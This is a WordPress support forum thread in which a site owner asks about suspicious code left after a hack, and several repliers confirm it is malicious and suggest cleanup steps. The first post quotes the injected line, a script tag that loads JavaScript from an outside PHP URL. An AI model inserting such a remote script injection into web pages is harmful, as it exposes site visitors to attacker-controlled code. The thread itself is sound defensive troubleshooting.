Title: WordPress Hacked, residule malicious code?
Last modified: August 21, 2016

---

# WordPress Hacked, residule malicious code?

 *  [swvc](https://wordpress.org/support/users/swvc/)
 * (@swvc)
 * [12 years ago](https://wordpress.org/support/topic/wordpress-hacked-residule-malicious-code/)
 * Hi,
 * My blog was hacked recently, however using a backup I have managed to bring it
   back from the dead. I have since installed better security and started backing
   everything up much more efficiently.
 * However, there is some code in the very top of all the pages that seems very 
   suspicous…
 *     ```
       <script type="text/javascript" src="http://shinohei.com/enkai/nmbdptqv.php?id="></script>
       ```
   
 * It then goes on to display the rest of the site, eg:
 * `<!DOCTYPE HTML><html lang="en-US" prefix="og: http://ogp.me/ns#" prefix="og:
   http://ogp.me/ns# fb: http://ogp.me/ns/fb#">`
 * Is this some left over malicious code? If so, how do I remove it?
 * Thank-you very much.

Viewing 4 replies - 1 through 4 (of 4 total)

 *  [Mark (podz)](https://wordpress.org/support/users/podz/)
 * (@podz)
 * [12 years ago](https://wordpress.org/support/topic/wordpress-hacked-residule-malicious-code/#post-4977135)
 * Please follow all the steps listed here:
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
 *  [BenSucuri](https://wordpress.org/support/users/rngdmstr/)
 * (@rngdmstr)
 * [12 years ago](https://wordpress.org/support/topic/wordpress-hacked-residule-malicious-code/#post-4977228)
 * If you can SSH into the server, do a ‘grep’ command for shinohei and that will
   let you know all of the files that contain that code 😉
 * From there, it’s as simple as deleting that string that you mentioned and saving
   overtop.
 *  [The Hack Repair Guy](https://wordpress.org/support/users/tvcnet/)
 * (@tvcnet)
 * [12 years ago](https://wordpress.org/support/topic/wordpress-hacked-residule-malicious-code/#post-4977236)
 * _Yes, that is most definitely malicious code. _
 * If I were reviewing I would download the site to my computer and do some file
   searches for that domain in the link you show above, among other searches.
 * Try that download and search just be to sure you got everything. Better safe…
 *  [peter_sucuri](https://wordpress.org/support/users/peter_sucuri/)
 * (@peter_sucuri)
 * [12 years ago](https://wordpress.org/support/topic/wordpress-hacked-residule-malicious-code/#post-4977261)
 * Hmm, injection of such short link prior to the rest of the legitimate site code
   could be also server-level infection. In such case, the cooperation with your
   hosting provider will be necessary. If you’re still having the problem please
   let us know here and let us know what steps did you already followed.

Viewing 4 replies - 1 through 4 (of 4 total)

The topic ‘WordPress Hacked, residule malicious code?’ is closed to new replies.

## Tags

 * [hacked](https://wordpress.org/support/topic-tag/hacked/)
 * [java](https://wordpress.org/support/topic-tag/java/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 4 replies
 * 5 participants
 * Last reply from: [peter_sucuri](https://wordpress.org/support/users/peter_sucuri/)
 * Last activity: [12 years ago](https://wordpress.org/support/topic/wordpress-hacked-residule-malicious-code/#post-4977261)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics